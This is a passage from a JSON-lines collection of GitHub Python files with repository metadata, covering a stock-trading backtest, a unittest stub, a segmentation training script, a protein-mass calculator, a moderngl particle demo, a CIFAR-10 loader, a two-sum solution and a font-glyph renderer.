(amount-buyAmount)):\r\n value += buyAmount\r\n stocks += 1\r\n amount -= value\r\n return amount, stocks\r\n\r\ndef sell(amount, sellAmount, stocks):\r\n amount += sellAmount*stocks\r\n stocks = 0\r\n return amount, stocks\r\n\r\ndef profit_loss(startMoney, endMoney):\r\n if endMoney < startMoney:\r\n return (\"Loss : \" + str(endMoney - startMoney))\r\n else:\r\n return (\"Profit : \" + str(endMoney - startMoney))\r\n\r\n\r\n# Importing file ----------------------------------------\r\nexFile = pd.ExcelFile(r\"sample_data.xls\")\r\ndf = exFile.parse()\r\ndf.drop(\"Unnamed: 0\", axis=1, inplace=True)\r\n\r\n\r\n# Creating custom fields --------------------------------\r\nd = [] # Storing date\r\nt = [] # Storing time\r\nr = [] # Storing profit/loss\r\ns = [] # Storing number of stocks currently holding\r\nca = [] # Storing current amount\r\nfor i in range(len(df)):\r\n d.append((df['date'][i])[:10])\r\n t.append((df['date'][i])[11:])\r\n r.append('')\r\n s.append('')\r\n ca.append('')\r\ndf['date'] = d\r\ndf['time'] = t\r\ndf['p/f'] = r\r\ndf['stocks'] = s\r\ndf['current_amount'] = ca\r\n\r\n\r\n# Start of analysis -------------------------------------\r\ncurrentAmount = 100000\r\nstocks = 0\r\ni = 0\r\ncount = 0\r\nwhile (i < len(df)):\r\n currentDate = df['date'][i]\r\n dayAmount = currentAmount\r\n \r\n buyTime = df['time'][i+1]\r\n buyAmount = df['low'][i+1]\r\n currentAmount, stocks = buy(currentAmount, buyAmount, stocks)\r\n df['stocks'][i+1] = stocks\r\n df['current_amount'][i+1] = currentAmount\r\n \r\n sellTime = df['time'][i+23]\r\n sellAmount = df['high'][i+23]\r\n currentAmount, stocks = sell(currentAmount, sellAmount, stocks)\r\n \r\n pf_res = profit_loss(dayAmount, currentAmount)\r\n df['p/f'][i+23] = pf_res\r\n df['stocks'][i+23] = stocks\r\n df['current_amount'][i+23] = currentAmount\r\n \r\n i += 25\r\n count += 1\r\n\r\n\r\n# Creating result dataframe to store in result excel file ----\r\nresult = pd.DataFrame()\r\nresult.index = [i for i in range(count)]\r\nr_d = []\r\nr_r = []\r\n\r\nfor i in range (23, len(df), 25):\r\n r_d.append(df['date'][i])\r\n r_r.append(df['p/f'][i])\r\n\r\nresult['date'] = r_d\r\nresult['result'] = r_r\r\n\r\nresult.to_excel('result.xlsx')\r\n\r\n# Finding maximum profit and loss -----------------------------\r\nfindMaxMin = []\r\nfor i in range(len(r_r)):\r\n ele = r_r[i].split(' ')\r\n findMaxMin.append(float(ele[2]))\r\n\r\nprint(\"Max profit = {}\\nMax loss = {}\\nTotal capital in the end = {}\".format(max(findMaxMin), min(findMaxMin), currentAmount))\r\n\r\n# Plotting graph for overall data ------------------------------\r\ndf_graph = pd.DataFrame()\r\ndf_graph['date'] = r_d\r\ndf_graph['open'] = ['' for i in range(count)]\r\ndf_graph['close'] = ['' for i in range(count)]\r\ndf_graph['high'] = ['' for i in range(count)]\r\ndf_graph['low'] = ['' for i in range(count)]\r\ni = 0\r\nk = 0\r\nwhile (i < len(df)):\r\n df_h = []\r\n df_l = []\r\n for j in range(i, i+25):\r\n df_h.append(df['high'][j])\r\n df_l.append(df['low'][j])\r\n df_graph['open'][k] = df['open'][i]\r\n df_graph['close'][k] = df['close'][i+24]\r\n df_graph['high'][k] = max(df_h)\r\n df_graph['low'][k] = min(df_l)\r\n i += 25\r\n k += 1\r\n \r\nfig1 = go.Figure(data=[go.Candlestick(x = df_graph['date'],\r\n open = df_graph['open'],\r\n high = df_graph['high'],\r\n low = df_graph['low'],\r\n close = 
df_graph['close'])])\r\nfig1.update_layout(xaxis_rangeslider_visible=False)\r\nfig1.show()\r\n","repo_name":"aryankumar10/analysis-assignment","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41960105601","text":"import unittest\n\nclass prueba(unittest.TestCase):\n # Functions beginning with \"test\" will be ran as a unit test.\n def test_positive_add(self):\n '''Verify that adding positive numbers works''' # Printed if test fails\n self.assertEqual(5, 5)\n\t\nif __name__=='__main__':\n unittest.main()\n\n","repo_name":"EGC-AgoraResultsTest/agora-results-tests","sub_path":"src/main/python/prueba.py","file_name":"prueba.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71119372239","text":"from torch.utils.data import DataLoader\r\nfrom potsdam_data import *\r\nfrom models.UNetFormer import UNetFormer\r\nfrom train_utils import train_one_epoch, evaluate, create_lr_scheduler\r\n\r\ndef create_model(num_classes):\r\n model = UNetFormer(\r\n decode_channels=64,\r\n dropout=0.1,\r\n backbone_name='resnet18',\r\n pretrained=False,\r\n window_size=8,\r\n num_classes=num_classes)\r\n return model\r\n\r\ntrain_batch_size = 1\r\nval_batch_size = 1\r\nbatch_size = 1\r\n\r\ntrain_dataset = PotsdamDataset(data_root='G:/postam_orignal/kaggle/working', mode='train',img_dir='images/test', mask_dir='anns/test',\r\n mosaic_ratio=0.25, transform=train_aug)\r\n\r\nval_dataset = PotsdamDataset(transform=val_aug)\r\ntest_dataset = PotsdamDataset(data_root='G:/postam_orignal/kaggle/working',img_dir='images/test', mask_dir='anns/test',\r\n transform=val_aug)\r\nnum_workers = min([os.cpu_count(), batch_size if batch_size > 1 else 0, 8])\r\ntrain_loader = DataLoader(dataset=train_dataset,\r\n batch_size=train_batch_size,\r\n num_workers=num_workers,\r\n pin_memory=True,\r\n shuffle=True,\r\n drop_last=True)\r\n\r\nval_loader = DataLoader(dataset=val_dataset,\r\n batch_size=val_batch_size,\r\n num_workers=num_workers,\r\n shuffle=False,\r\n pin_memory=True,\r\n drop_last=False)\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\nmodel = create_model(num_classes=6)\r\nmodel.to(device)\r\nparams_to_optimize = [p for p in model.parameters() if p.requires_grad]\r\noptimizer = torch.optim.SGD(\r\n params_to_optimize,\r\n lr=0.01, momentum=0.9, weight_decay=1e-4,\r\n )\r\n\r\namp = False\r\nscaler = torch.cuda.amp.GradScaler() if amp else None\r\n\r\n # 创建学习率更新策略,这里是每个step更新一次(不是每个epoch)\r\nlr_scheduler = create_lr_scheduler(optimizer, len(train_loader), 10, warmup=True)\r\n\r\nnum_classes = 6\r\nbest_dice = 0\r\n\r\nfor epoch in range(0,10):\r\n \r\n \r\n mean_loss, lr = train_one_epoch(model, optimizer, train_loader, device, epoch, num_classes,\r\n lr_scheduler=lr_scheduler, print_freq=100, scaler=scaler)\r\n confmat = evaluate(model, val_loader, device=device, num_classes=num_classes)\r\n val_info = str(confmat)\r\n print(val_info)\r\n ","repo_name":"Jacky-Android/UNetFormer-biformer","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"39142634576","text":"\"\"\"\nEmit particles from mouse positions with random velocities\nadding the current velocity of the mouse pointer.\n\nShows how you can use 
transform feedback with custom emitting.\nYou can emit with the gpu or cpu. The main trick is to use\ntransform() with the buffer_offset parameter writing to be back\nof the buffer. We use a query object in this example that can\npotentially stall rendering a bit, but it's still orders of\nmagnitude faster than doing everything on the cpu. using\ntransform() with a buffer offset can be used in many creative ways.\n\nThis is similar to pausing and resuming transform feedbacks,\nbut works in GL 3.3 core.\n\n* The geometry shader is used to destroy geometry for expired\n particles.\n* We use a query to count how many primitives the geometry shader\n actually emitted so we can know how many new particles we should\n emit.\n\nWe show 3 different emit methods:\n* Method #1: CPU emitting by manually writing new particles to the end of the buffer.\n This will probably stream up the entire buffer per frame, but is acceptable\n for smaller amount of data.\n* Method #2: CPU emitting by filling a smaller emit buffer to reduce the amount of data we stream per frame\n Here we fill a smaller emit buffer and render that to the end of the output buffer\n to greatly reduce the amount of data we stream to the gpu per frame.\n* Method #3: GPU emitting. A shader simply calculates the new values.\n No buffer streaming. All is on the gpu side. This method is\n orders of magnitude faster than method 1 and 2\n\nEmit particles from mouse positions:\n\n mouse_control = True\n\nEmit particles from a predetermined path:\n\n mouse_control = False\n\n\"\"\"\nimport numpy as np\n\nimport moderngl\nfrom moderngl_window import screenshot\nfrom ported._example import Example\nfrom pyrr import matrix44\n\n\nclass Particles(Example):\n title = \"Particle System Emitter\"\n gl_version = (3, 3)\n aspect_ratio = None\n mouse_control = False\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n # Renders particles to the screen\n self.prog = self.ctx.program(\n vertex_shader='''\n #version 330\n\n uniform mat4 projection;\n\n in vec2 in_pos;\n in vec3 in_color;\n out vec3 color;\n\n void main() {\n gl_Position = projection * vec4(in_pos, 0.0, 1.0);\n color = in_color;\n }\n ''',\n fragment_shader='''\n #version 330\n\n out vec4 f_color;\n in vec3 color;\n\n void main() {\n f_color = vec4(color, 1.0);\n }\n ''',\n )\n\n # Animates / transforms the particles per frame\n self.transform = self.ctx.program(\n vertex_shader='''\n #version 330\n\n in vec2 in_pos;\n in vec2 in_vel;\n in vec3 in_color;\n\n out vec2 vs_vel;\n out vec3 vs_color;\n\n void main() {\n gl_Position = vec4(in_pos, 0.0, 1.0);\n vs_vel = in_vel;\n vs_color = in_color;\n }\n ''',\n geometry_shader='''\n #version 330\n\n layout(points) in;\n layout(points, max_vertices = 1) out;\n\n uniform float gravity;\n uniform float ft;\n\n in vec2 vs_vel[1];\n in vec3 vs_color[1];\n\n out vec2 out_pos;\n out vec2 out_vel;\n out vec3 out_color;\n\n void main() {\n vec2 pos = gl_in[0].gl_Position.xy;\n vec2 velocity = vs_vel[0];\n\n if (pos.y > -1.0) {\n vec2 vel = velocity + vec2(0.0, gravity);\n out_pos = pos + vel * ft;\n out_vel = vel;\n out_color = vs_color[0];\n EmitVertex();\n EndPrimitive();\n }\n }\n ''',\n varyings=['out_pos', 'out_vel', 'out_color'],\n )\n self.mouse_pos = 0, 0\n self.mouse_velocity = 0.001, 0.001 # default value must not be 0. 
any number is fine\n self.prog['projection'].write(self.projection)\n self.transform['gravity'].value = -.01 # affects the velocity of the particles over time\n self.ctx.point_size = self.wnd.pixel_ratio * 2 # point size\n\n self.N = 25_000 # particle count\n self.active_particles = self.N // 100 # Initial / current number of active particles\n self.max_emit_count = self.N // 100 # Maximum number of particles to emit per frame\n self.stride = 28 # byte stride for each vertex\n self.floats = 7\n # Note that passing dynamic=True probably doesn't mean anything to most drivers today\n self.vbo1 = self.ctx.buffer(reserve=self.N * self.stride)\n self.vbo2 = self.ctx.buffer(reserve=self.N * self.stride)\n # Write some initial particles\n self.vbo1.write(\n np.fromiter(\n self.gen_particles(self.active_particles),\n count=self.active_particles * self.floats,\n dtype='f4',\n )\n )\n\n # Transform vaos. We transform data back and forth to avoid buffer copy\n self.transform_vao1 = self.ctx.vertex_array(\n self.transform,\n [(self.vbo1, '2f 2f 3f', 'in_pos', 'in_vel', 'in_color')],\n )\n self.transform_vao2 = self.ctx.vertex_array(\n self.transform,\n [(self.vbo2, '2f 2f 3f', 'in_pos', 'in_vel', 'in_color')],\n )\n\n # Render vaos. The render to screen version of the transform vaos above\n self.render_vao1 = self.ctx.vertex_array(\n self.prog,\n [(self.vbo1, '2f 2x4 3f', 'in_pos', 'in_color')],\n )\n self.render_vao2 = self.ctx.vertex_array(\n self.prog,\n [(self.vbo2, '2f 2x4 3f', 'in_pos', 'in_color')],\n )\n\n # Setup for emit method #2. The emit buffer size is only max_emit_count.\n self.emit_buffer_elements = self.max_emit_count\n self.emit_buffer = self.ctx.buffer(reserve=self.emit_buffer_elements * self.stride)\n self.emit_buffer_prog = self.ctx.program( # Siple shader just emitting a buffer\n vertex_shader='''\n # version 330\n in vec2 in_pos;\n in vec2 in_vel;\n in vec3 in_color;\n out vec2 out_pos;\n out vec2 out_vel;\n out vec3 out_color;\n void main() {\n out_pos = in_pos;\n out_vel = in_vel;\n out_color = in_color;\n }\n ''',\n varyings=['out_pos', 'out_vel', 'out_color'],\n )\n self.emit_buffer_vao = self.ctx.vertex_array(\n self.emit_buffer_prog,\n [(self.emit_buffer, '2f 2f 3f', 'in_pos', 'in_vel', 'in_color')],\n )\n\n # Setup for method #3: GPU emitting\n self.gpu_emitter_prog = self.ctx.program(\n vertex_shader='''\n # version 330\n #define M_PI 3.1415926535897932384626433832795\n uniform vec2 mouse_pos;\n uniform vec2 mouse_vel;\n uniform float time;\n\n out vec2 out_pos;\n out vec2 out_vel;\n out vec3 out_color;\n\n float rand(float n){return fract(sin(n) * 43758.5453123);}\n void main() {\n float a = mod(time * gl_VertexID, M_PI * 2);\n float r = clamp(rand(time + gl_VertexID), 0.1, 0.9);\n out_pos = mouse_pos;\n out_vel = vec2(sin(a), cos(a)) * r + mouse_vel;\n out_color = vec3(\n rand(time * 1.3 + gl_VertexID), rand(time * 3.4 + gl_VertexID),\n rand(time * 2.0 + gl_VertexID)\n );\n }\n ''',\n varyings=['out_pos', 'out_vel', 'out_color'],\n )\n self.gpu_emitter_vao = self.ctx._vertex_array(self.gpu_emitter_prog, [])\n\n # Query object to inspect render calls\n self.query = self.ctx.query(primitives=True)\n\n def render(self, time, frame_time):\n self.transform['ft'].value = max(frame_time, 0.02)\n\n if not self.mouse_control:\n self.move_mouse(time)\n\n # Cycle emit methods per frame\n method = self.wnd.frames % 3 + 1\n # ---> HARDCODE METHOD HERE <---\n # method = 3\n if method == 1:\n self.emit_cpu_simple(time, frame_time)\n elif method == 2:\n self.emit_cpu_buffer(time, 
frame_time)\n elif method == 3:\n self.emit_gpu(time, frame_time)\n\n # Swap around objects for next frame\n self.transform_vao1, self.transform_vao2 = self.transform_vao2, self.transform_vao1\n self.render_vao1, self.render_vao2 = self.render_vao2, self.render_vao1\n self.vbo1, self.vbo2 = self.vbo2, self.vbo1\n\n err = self.ctx.error \n if err != \"GL_NO_ERROR\":\n print(err)\n\n def emit_cpu_simple(self, time, frame_time):\n \"\"\"Method #1\n Emit new particles simply by writing new particles to\n to the end of the buffer. This will most likely cause\n the entire buffer to be re-written to the gpu, but is\n probably acceptable for smaller particle amounts.\n \"\"\"\n # Transform all particles recoding how many elements were emitted by geometry shader\n with self.query:\n self.transform_vao1.transform(self.vbo2, moderngl.POINTS, vertices=self.active_particles)\n\n # Emit new particles if needed simply by writing to the end of the buffer (cpu)\n emit_count = min(self.N - self.query.primitives, self.max_emit_count)\n if emit_count > 0:\n self.vbo2.write(\n np.fromiter(self.gen_particles(emit_count), 'f4', count=emit_count * self.floats),\n offset=self.query.primitives * self.stride,\n )\n\n self.active_particles = self.query.primitives + emit_count\n self.render_vao2.render(moderngl.POINTS, vertices=self.active_particles)\n\n def emit_cpu_buffer(self, time, frame_time):\n \"\"\"Method #2\n Emit new particles by writing new ones with the cpu\n to a separate emit buffer. This buffer can be smaller\n than the main particle buffer meaning less buffer\n data to stream to the gpu per frame.\n \"\"\"\n # Transform all particles recoding how many elements were emitted by geometry shader\n with self.query:\n self.transform_vao1.transform(self.vbo2, moderngl.POINTS, vertices=self.active_particles)\n\n emit_count = min(self.N - self.query.primitives, self.emit_buffer_elements, self.max_emit_count)\n if emit_count > 0:\n self.emit_buffer.write(\n np.fromiter(self.gen_particles(emit_count), 'f4', count=emit_count * self.floats)\n )\n self.emit_buffer_vao.transform(\n self.vbo2,\n vertices=emit_count,\n buffer_offset=self.query.primitives * self.stride,\n )\n\n self.active_particles = self.query.primitives + emit_count\n self.render_vao2.render(moderngl.POINTS, vertices=self.active_particles)\n\n def emit_gpu(self, time, frame_time):\n \"\"\"Method #3\n Emit new particles using a shader.\n \"\"\"\n # Transform all particles recoding how many elements were emitted by geometry shader\n with self.query:\n self.transform_vao1.transform(self.vbo2, moderngl.POINTS, vertices=self.active_particles)\n\n emit_count = min(self.N - self.query.primitives, self.emit_buffer_elements, self.max_emit_count)\n if emit_count > 0:\n self.gpu_emitter_prog['mouse_pos'].value = self.mouse_pos\n self.gpu_emitter_prog['mouse_vel'].value = self.mouse_velocity\n self.gpu_emitter_prog['time'].value = max(time, 0)\n self.gpu_emitter_vao.transform(\n self.vbo2,\n vertices=emit_count,\n buffer_offset=self.query.primitives * self.stride,\n )\n\n self.active_particles = self.query.primitives + emit_count\n self.render_vao2.render(moderngl.POINTS, vertices=self.active_particles)\n\n def gen_particles(self, n):\n for _ in range(n):\n # Current mouse position (2 floats)\n yield self.mouse_pos[0]\n yield self.mouse_pos[1]\n # Random velocity (2 floats)\n a = np.random.uniform(0.0, np.pi * 2.0)\n r = np.random.uniform(0.1, 0.9)\n yield np.cos(a) * r + self.mouse_velocity[0]\n yield np.sin(a) * r + self.mouse_velocity[1]\n # Random color (3 
floats)\n yield np.random.uniform(0.0, 1.0)\n yield np.random.uniform(0.0, 1.0)\n yield np.random.uniform(0.0, 1.0)\n\n @property\n def projection(self):\n return matrix44.create_orthogonal_projection(\n -self.wnd.aspect_ratio, self.wnd.aspect_ratio,\n -1, 1,\n -1, 1,\n dtype='f4',\n )\n\n def resize(self, width, height):\n \"\"\"Handle window resizing\"\"\"\n self.prog['projection'].write(self.projection)\n\n def mouse_position_event(self, x, y, dx, dy):\n if not self.mouse_control:\n return\n\n self.mouse_pos = (\n (x / self.wnd.width * 2 - 1) * self.wnd.aspect_ratio,\n -(y / self.wnd.height * 2 - 1),\n )\n self.mouse_velocity = dx / 25, -dy / 25\n\n def move_mouse(self, time):\n new_pos = (\n np.sin(time * 2.0) * self.wnd.aspect_ratio * 0.9,\n np.cos(time * 2.0) * 0.15,\n )\n self.mouse_velocity = (\n (new_pos[0] - self.mouse_pos[0]) * 10,\n (new_pos[1] - self.mouse_pos[1]) * 10,\n )\n self.mouse_pos = new_pos\n\n def key_event(self, key, action, modifiers):\n keys = self.wnd.keys\n\n if action == keys.ACTION_PRESS and key == keys.F1:\n screenshot.create(self.wnd.fbo)\n\n\nif __name__ == '__main__':\n Particles.run()\n","repo_name":"moderngl/moderngl","sub_path":"examples/particle_system_emit.py","file_name":"particle_system_emit.py","file_ext":"py","file_size_in_byte":14236,"program_lang":"python","lang":"en","doc_type":"code","stars":1670,"dataset":"github-code","pt":"29"} +{"seq_id":"2673241938","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport tensorflow as tf\n\nfrom tensorflow.python.platform import gfile\n\n# 图片的长宽\nIMAGE_SIZE = 32\n# 图片的种类\nNUM_CLASSES = 10\n\nNUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 50000\nNUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 10000\n\n\ndef input_from_binary(data_dir, batch_size):\n if not data_dir:\n raise ValueError('找不到data的文件目录')\n return distorted_inputs(data_dir=data_dir,\n batch_size=batch_size)\n\n\n# 读取二进制图片\ndef distorted_inputs(data_dir, batch_size):\n filenames = [os.path.join(data_dir, 'data_batch_%d.bin' % i)\n for i in range(1, 6)]\n for f in filenames:\n if not gfile.Exists(f):\n raise ValueError('Failed to find file: ' + f)\n\n # 创建一个队列来读取\n filename_queue = tf.train.string_input_producer(filenames)\n\n # 从队列中读取数据\n read_input = read_cifar10(filename_queue)\n reshaped_image = tf.cast(read_input.uint8image, tf.float32)\n\n # height = IMAGE_SIZE\n # width = IMAGE_SIZE\n\n\n # distorted_image = tf.random_crop(reshaped_image, [height, width, 3])\n\n # 随机水平移动\n # distorted_image = tf.image.random_flip_left_right(distorted_image)\n\n # 随机排序\n # distorted_image = tf.image.random_brightness(reshaped_image,max_delta=63)\n # distorted_image = tf.image.random_contrast(distorted_image,lower=0.2, upper=1.8)\n\n # 减去均值像素,并除以像素方差 (图片标准化)\n float_image = tf.image.per_image_standardization(reshaped_image)\n\n # 确保随机洗牌具有良好的混合性能.\n min_fraction_of_examples_in_queue = 0.4\n min_queue_examples = int(NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN *\n min_fraction_of_examples_in_queue)\n print('Filling queue with %d CIFAR images before starting to train. '\n 'This will take a few minutes.' 
% min_queue_examples)\n\n # 通过建立一个队列实例生成一批图像和标签\n return _generate_image_and_label_batch(float_image, read_input.label,\n min_queue_examples, batch_size)\n\n\ndef read_cifar10(filename_queue):\n class CIFAR10Record(object):\n pass\n\n result = CIFAR10Record()\n\n # 图片原大小\n label_bytes = 1\n result.height = 32\n result.width = 32\n result.depth = 3\n image_bytes = result.height * result.width * result.depth\n # 总大小\n record_bytes = label_bytes + image_bytes\n\n # 从二进制文件中读取固定长度记录\n reader = tf.FixedLengthRecordReader(record_bytes=record_bytes)\n result.key, value = reader.read(filename_queue)\n # decode_raw操作可以将一个字符串转换为一个uint8的张量。\n record_bytes = tf.decode_raw(value, tf.uint8)\n\n # 首个字节是label,并将uint8转换成int32\n result.label = tf.cast(\n tf.slice(record_bytes, [0], [label_bytes]), tf.int32)\n\n # 剩下的是图片, 从[depth*height*width]变成 [depth, height, width]\n depth_major = tf.reshape(tf.slice(record_bytes, [label_bytes], [image_bytes]),\n [result.depth, result.height, result.width])\n # [depth, height, width] -> [height, width, depth].\n result.uint8image = tf.transpose(depth_major, [1, 2, 0])\n\n return result\n\n\ndef _generate_image_and_label_batch(image, label, min_queue_examples,\n batch_size):\n \"\"\"构建batch\n 输入:\n image: [height, width, 3]\n label: [label]\n\n Returns:\n images: [1, height, width, 3]\n labels: [1]\n \"\"\"\n # 创建一个队列打乱数据, 然后读取从队列中'batch_size' images + labels .\n num_preprocess_threads = 16\n\n images, label_batch = tf.train.shuffle_batch(\n [image, label],\n batch_size=batch_size,\n num_threads=num_preprocess_threads,\n capacity=min_queue_examples + 3 * batch_size,\n min_after_dequeue=min_queue_examples)\n\n tf.summary.image('images', images)\n\n labels = tf.reshape(label_batch, [batch_size])\n\n sparse_labels = tf.reshape(labels, [batch_size, 1])\n\n indices = tf.expand_dims(tf.range(0, batch_size), 1)\n\n # 组合\n\n concated = tf.concat([indices, sparse_labels], 1)\n\n dense_labels = tf.sparse_to_dense(concated,\n [batch_size, NUM_CLASSES],\n 1.0, 0.0)\n\n return images, dense_labels\n","repo_name":"wangtianrui/MNIST","sub_path":"cifar_input_data.py","file_name":"cifar_input_data.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20869838322","text":"\"\"\"\n Image-based social media website recognizer.\n\n @author: Jakub Turek\n @contact: jkbturek(at)gmail(dot)com\n @date: 03-05-2013\n @version: 1.0\n\"\"\"\n\n\nclass ImageBasedWebsiteRecognizer:\n def is_image_based_website(self, html, tree_builder, tree_browser, configuration_provider):\n \"\"\"\n @type tree_builder: HTMLTreeBuilder\n @type tree_browser: HTMLTreeBrowser\n @type configuration_provider: ConfigurationProvider\n \"\"\"\n\n configuration = configuration_provider.get_configuration(self)\n\n html_tree = tree_builder.build_tree(html, configuration['parsed_tree_attributes'].split(';'))\n\n repeating_patterns = tree_browser.get_repeated_nodes(html_tree,\n int(configuration['min_images']),\n configuration['repeated_patterns_tags'].split(';'),\n configuration['repeated_patterns_attributes'].split(';'))\n\n for pattern in repeating_patterns:\n if tree_browser.has_mutual_parent(repeating_patterns[pattern]):\n grouped_mutual_children = tree_browser.get_mutual_children(repeating_patterns[pattern],\n configuration['grouped_children_tags'].\n split(';'),\n configuration['grouped_children_attributes'].\n split(';'))\n\n if grouped_mutual_children:\n for group in grouped_mutual_children:\n if 
tree_browser.has_direct_children(grouped_mutual_children[group],\n configuration['direct_children_tag']):\n return True\n\n return False\n","repo_name":"manisero/SemViii","sub_path":"WEDT/algorithm/imagebasedwebsiterecognizer.py","file_name":"imagebasedwebsiterecognizer.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"3495521223","text":"AAMMFilePath = open(r\"AminoAcidMonoisotopicMassTable.txt\")\r\n\r\nwith AAMMFilePath:\r\n AAMMlist = AAMMFilePath.read().splitlines()\r\n\r\nProteinSeq = input(\"What is the protein sequence for the protein you would like the mass of?\")\r\n\r\nmass = 0\r\nfor AA in ProteinSeq:\r\n for aa in AAMMlist:\r\n if AA == aa[0]:\r\n mass += float(aa[4:])\r\nprint(round(mass,3))\r\n\r\n\r\n\r\n","repo_name":"shawnr-ca/RosalindSolutions","sub_path":"Scripts/CalculatingProteinMass.py","file_name":"CalculatingProteinMass.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"41129898807","text":"from django import template\nimport re\nfrom django.utils.safestring import mark_safe\n\nregister = template.Library()\n\n\n@register.filter\ndef inline_tags(value):\n \"\"\" parses inline tags into valid html \"\"\"\n value = re.sub(r'_([^_]+)_', r'\\1', value)\n return mark_safe(value)\n\n\n@register.filter\ndef strip_tags(value):\n \"\"\" removes all markup tags and returns plain text string \"\"\"\n value = re.sub(r'_([^_]+)_', r'\\1', value)\n return value\n\n\n@register.filter('caption')\ndef insert_span_to(value, marker=':'):\n \"\"\" creates a span from beginning of input string to marker \"\"\"\n html_class = 'inngangsord'\n strip = False\n if marker in value:\n find = r'^(.*?){}'.format(marker)\n replace = r'\\1{}'.format(html_class, '' if strip else marker)\n value = re.sub(find, replace, value, re.M)\n return mark_safe(value)\n\n\n@register.filter('tingo')\ndef insert_tingo(value, marker=':'):\n \"\"\" tingo filter \"\"\"\n html_class = 'inngangsord'\n find = r'^(.{10}\\S*)'\n replace = r'\\1{0}'.format(html_class)\n value = re.sub(find, replace, value, re.M)\n return mark_safe(value)","repo_name":"haakenlid/tassen-dockerize","sub_path":"django/apps/markup/templatetags/parse_markup.py","file_name":"parse_markup.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"71811738317","text":"\"\"\"\n\nGiven an array of integers, return indices of the two numbers such that they add up to a specific target.\n\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\nExample:\nGiven nums = [2, 7, 11, 15], target = 9,\n\nBecause nums[0] + nums[1] = 2 + 7 = 9,\nreturn [0, 1].\n\"\"\"\n\n\nclass Solution:\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n sort = sorted(nums)\n lesser = 0\n greater = len(sort) - 1\n while lesser < greater:\n number = sort[greater] + sort[lesser]\n if target == number:\n first = None\n for i, num in enumerate(nums):\n if num == sort[greater] or num == sort[lesser]:\n if first is None:\n first = i\n else:\n return [first, i]\n raise Exception\n elif target < number:\n greater -= 1\n else:\n lesser += 1\n\n raise Exception\n\n\ns = Solution()\nassert s.twoSum([2, 7, 11, 15], 9) == [0, 
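# --- editor's sketch, not part of the dataset records ---
# The twoSum above sorts first (O(n log n)) and then needs a second pass to
# recover the original indices; the canonical O(n) variant keeps a
# value -> index hash map instead:
#
#     def two_sum_linear(nums, target):
#         seen = {}
#         for i, num in enumerate(nums):
#             if target - num in seen:
#                 return [seen[target - num], i]
#             seen[num] = i
#         raise Exception
# --- end sketch ---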
1]\n","repo_name":"jsmith/crackingthecodinginterview","sub_path":"leet/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40432153238","text":"#!/usr/bin/env python3\nimport sys\nfrom PIL import Image, ImageFont, ImageDraw\n\nGLYPHS = [\n    'ABCDEFGHIJKLMNOPQRSTUVWXYZ',\n    'abcdefghijklmnopqrstuvwxyz',\n    '0123456789',\n]\nGLYPH_HEIGHT = 16\nGLYPH_WIDTH = 8\nGLYPH_V_SPACING = 0\nGLYPH_H_SPACING = 0\n\n\ndef get_glyph_index(glyph: str) -> tuple[int, int] | None:\n    if len(glyph) != 1:\n        raise ValueError(glyph)\n\n    for y in range(len(GLYPHS)):\n        res = GLYPHS[y].find(glyph)\n        if res >= 0:\n            return (res, y)\n\n    return None\n\n\ndef get_glyph_box(glyph: str) -> tuple[int, int, int, int] | None:\n    coords = get_glyph_index(glyph)\n    if coords is None:\n        return None\n    x, y = coords\n    x0 = GLYPH_H_SPACING + x * (GLYPH_WIDTH + GLYPH_H_SPACING)\n    y0 = GLYPH_V_SPACING + y * (GLYPH_HEIGHT + GLYPH_V_SPACING)\n    x1 = x0 + GLYPH_WIDTH\n    y1 = y0 + GLYPH_HEIGHT\n\n    return (x0, y0, x1, y1)\n\n\ndef get_glyphs_boxes() -> dict[str, tuple[int, int, int, int]]:\n    res = {}\n    for line in GLYPHS:\n        for glyph in line:\n            res[glyph] = get_glyph_box(glyph)\n\n    return res\n\n\ndef get_glyph_pixels(img: Image.Image) -> dict[str, list[tuple[int, int]]]:\n    glyph_boxes = get_glyphs_boxes()\n\n    res = {}\n    for glyph in glyph_boxes:\n        glyph_img = img.crop(glyph_boxes[glyph])\n        pixels = []\n        for x in range(GLYPH_WIDTH):\n            for y in range(GLYPH_HEIGHT):\n                if glyph_img.getpixel((x, y)) > 0:\n                    pixels.append((x, y))\n\n        res[glyph] = pixels\n\n    return res\n\n\ndef render_font(path: str,\n                width: int = 800,\n                height: int = 600,\n                font_size: int = 16) -> Image.Image:\n    img = Image.new('1', (width, height))\n    draw = ImageDraw.Draw(img)\n\n    font = ImageFont.truetype(path, size=font_size)\n\n    for y in range(len(GLYPHS)):\n        for x in range(len(GLYPHS[y])):\n            glyph = GLYPHS[y][x]\n            glyph_x = GLYPH_H_SPACING + x * (GLYPH_WIDTH + GLYPH_H_SPACING)\n            glyph_y = GLYPH_V_SPACING + y * (GLYPH_HEIGHT + GLYPH_V_SPACING)\n            draw.text((glyph_x, glyph_y), 